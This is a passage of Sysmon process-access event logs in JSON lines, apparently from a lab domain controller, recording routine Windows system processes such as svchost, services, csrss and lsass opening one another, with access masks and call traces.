C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.272","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":869,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.272\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nSourceProcessId: 852\r\nSourceThreadId: 948\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010D6020100}\r\nTargetProcessId: 1808\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d7ae|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.272","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","SourceProcessId":"852","SourceThreadId":"948","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010D6020100}","TargetProcessId":"1808","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d7ae|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":870,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.272\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010D6020100}\r\nTargetProcessId: 1808\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.272","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010D6020100}","TargetProcessId":"1808","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":871,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.287\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010D6020100}\r\nTargetProcessId: 1808\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.287","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010D6020100}","TargetProcessId":"1808","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":872,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.287\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nSourceProcessId: 852\r\nSourceThreadId: 1184\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010D6020100}\r\nTargetProcessId: 1808\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.287","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","SourceProcessId":"852","SourceThreadId":"1184","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010D6020100}","TargetProcessId":"1808","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":873,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.287\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nTargetProcessId: 852\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.287","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","TargetProcessId":"852","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":874,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.287\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.287","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":875,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.287\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.287","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":876,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.303\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.303","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
